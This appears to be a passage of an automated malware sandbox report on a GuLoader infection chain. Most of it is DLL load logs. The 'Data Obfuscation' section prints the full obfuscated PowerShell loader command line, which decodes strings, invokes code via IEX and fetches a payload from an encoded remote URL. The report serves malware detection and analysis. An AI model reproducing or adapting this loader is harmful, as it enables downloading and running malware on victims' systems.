              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000006.00000002.1577977343.00000000005EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandlerV source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000F.00000002.2216062150.0000000004301000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1619238157.0000000008991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1618891964.00000000081F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1602163136.000000000545A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1243751229.0000027592CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gribben)$GlobaL:kURsgevInst = [SysTem.tExt.ENcoDInG]::AsCII.geTStrinG($IsOLaTIonSmatERiaLes)$gLoBAl:HAvEMnd=$kuRSgEvInst.SuBStRINg($DESPeRaNCe,$poSSESsIOnaTE)<#Unsaintlike Umenneskel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Attakerede $Didoes $Koloniser), (Gdninger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Merychippus202 = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tiphiidae)), $Ekstrabevillingen).DefineDynamicModule($Delspecifikationens, $false).DefineType($Pendulums, $Teologernes, [System.Multic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gribben)$GlobaL:kURsgevInst = [SysTem.tExt.ENcoDInG]::AsCII.geTStrinG($IsOLaTIonSmatERiaLes)$gLoBAl:HAvEMnd=$kuRSgEvInst.SuBStRINg($DESPeRaNCe,$poSSESsIOnaTE)<#Unsaintlike Umenneskel
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
